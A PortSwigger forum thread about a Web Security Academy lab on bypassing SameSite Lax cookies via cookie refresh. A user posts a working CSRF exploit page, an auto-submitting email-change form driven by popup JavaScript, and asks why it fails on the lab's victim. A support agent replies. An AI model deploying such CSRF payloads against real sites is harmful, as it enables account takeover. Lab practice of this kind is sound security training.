Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: SameSite Lax bypass via cookie refresh - Question regarding victim behavior.

Jacek | Last updated: Aug 03, 2023 02:06PM UTC

Hi Team, Is there any specific limitations on victim behavior, like timeout or number of URLs that client enters? I tested exploit on myself and it work. I'm not sure why it's not working on victim. ------------------ <p>Click anywhere on the page</p> <form action="https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="pwnd@o2.pl" /> </form> <script> window.onclick = () => { hack(); }; hack = function(){ var popup = window.open('https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/logout'); setTimeout(function(){popup.location.href = 'https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account';}, 1000); setTimeout(function(){history.pushState('', '', '/');document.forms[0].submit();}, 6000); }; </script> -------------------- Changing actions to: 1. logout 2. social-login 3. submit form also didn't work. I'm wondering if it's my mistake or victims' limitation. Thanks, J

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 07:13AM UTC

Hi Jacek, Have you changed the email address that is being used in your exploit between testing it on yourself and then delivering it to the victim user?

Jacek | Last updated: Aug 04, 2023 08:27AM UTC

Hi Ben, Yes, I did. I try to modify email address with every attempt. Only thing that worked was changing actions to: 1. social-login 2. submit form Thanks, Jacek

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 03:37PM UTC